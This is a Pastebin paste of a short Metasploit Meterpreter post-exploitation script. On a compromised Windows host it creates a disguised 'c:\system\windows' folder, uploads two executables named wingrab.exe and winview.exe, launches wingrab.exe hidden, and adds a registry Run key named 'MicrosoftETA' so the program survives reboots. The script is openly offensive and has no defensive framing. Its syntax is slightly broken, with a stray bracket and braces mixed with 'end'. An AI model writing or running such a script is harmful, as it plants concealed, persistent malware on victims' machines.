Guest User

Untitled

a guest
Jun 18th, 2018
73
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.89 KB | None | 0 0
  1. if(not client.sys.process["wingrab.exe"]])
  2. {
  3. print_status("LAUNCHING SCRIPT FROM SESSION #{client}")
  4. print_status("Creating directory")
  5. client.fs.dir.mkdir("c:\\system")
  6. client.fs.dir.mkdir("c:\\system\\windows")
  7. client.fs.file.upload_file("c:\\system\\windows\\wingrab.exe" , "/root/Desktop/exploits/Project/wingrab.exe")
  8. client.fs.file.upload_file("c:\\system\\windows\\winview.exe" , "/root/Desktop/exploits/Project/winview.exe")
  9. client.sys.process.execute("c:\\system\\windows\\wingrab.exe", nil, {'Hidden' => 'true'})
  10. key = "HKLM\\software\\microsoft\\windows\\currentversion\\run"
  11. value = "MicrosoftETA"
  12. data = "c:\\system\\windows\\wingrab.exe"
  13. type = "REG_SZ"
  14. root_key, base_key = client.sys.registry.splitkey(key)
  15. open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
  16. open_key.set_value(value, client.sys.registry.type2str(type), data)
  17. print_line("Successful")
  18. }
  19. end
Add Comment
Please, Sign In to add comment